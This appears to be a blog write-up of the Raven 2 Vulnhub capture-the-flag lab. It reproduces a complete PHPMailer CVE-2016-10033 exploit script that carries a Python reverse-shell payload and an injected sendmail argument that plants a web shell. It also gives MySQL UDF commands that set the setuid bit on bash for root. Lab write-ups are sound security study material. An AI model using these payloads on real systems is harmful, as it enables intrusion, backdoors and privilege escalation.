muzec - Raven 2 Writeup | root💀muzec-sec:~#

Raven 2 is part of the series of Raven on Vulnhub very interesting challenge you can grab a copy here Download Raven Series Here .

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Fri May 28 04:57:42 2021 as: nmap -sC -p- -sV -oA nmap 172.16.139.189
Nmap scan report for 172.16.139.189
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          32986/tcp   status
|   100024  1          33140/tcp6  status
|   100024  1          37138/udp6  status
|_  100024  1          59200/udp   status
32986/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 28 04:57:56 2021 -- 1 IP address (1 host up) scanned in 14.65 seconds

We got 4 open ports when i scan for full ports 22,80,111 and 32986 let burst some directory since we know port 80 is active.

Wordpress directory cool let check it .

It actually a wordpress page using wpscan to enumerate for users.

Got 2 users i trying brute forcing but got no luck so let go back to our gobuster result but i decided to check the wordpress uploads page.

And boom we have our flag.

Now let go back to the gobuster results.

Checking vendor .

Let check the PATH and we have our first flag.

Seeing PHPMailer seems we are dealing with that so i try checking for the version and boom we have it in the VERSION page.

Using a quick searchsploit to check for exploit and we have a list of exploits.

Let try the python exploit and see going through the exploit seems we need a page that is sending a mail to the web server and the one that stand out is the contact.php .

Now let edit our exploit.

"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://raven.local/contact.php'
backdoor = '/rev.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'172.20.10.4\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/rev.php server\" @protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)

Remember to edit it to your IP for gettting a reverse shell.

Let start and Ncat listener and run the exploit.

Now let access the backdoor we just added rev.php to get our shell.

http://raven.local/rev.php going to our listener and we have our shell.

Spawning TTY shell ` python -c ‘import pty; pty.spawn (“/bin/bash”)’` so i try finding the flag2 first since we have 1 and 3 already .

find / -name flag2.txt 2>/dev/null and boom we have it.

Now let go get the last flag probably it will be in the root folder for sure so i try checking how many users we have on the target.

Privilege Escalation

Going through the home directory for each users i found nothing so i decided to run linpeas.sh and between i found the MYSQL credentials.

But nothing interesting in the databases but can be usefull keep it and let run our linpeas.sh .

So we found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability link here https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html also i try to confirm the version.

Cool let find our exploit.

So i download the exploit on my machine seems we need to compile it let hit it.

gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

Now let transfer it to our target.

Now we logged in to the MySQL.

mysql -u root -p

Now we are in MYSQL let create a table.

use mysql;

In this table, we inserted the link to 1518.so file we just imported from the local machine to /tmp directory.

We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)

In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.

Hence, we are invoking the code “chmod u+s /bin/bash” to set the sticky bit on “bash”

create table shell(line blob);
insert into shell values(load_file('/tmp/1518.so'));
show variables like '%plugin%';
SHOW VARIABLES LIKE "secure_file_priv";
select * from shell into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /bin/bash');

Now to get our root shell we are going to use /bin/bash -p and we should have root shell.

Getting the last flag.

We are root and done.

Greeting From Muzec

Back To Home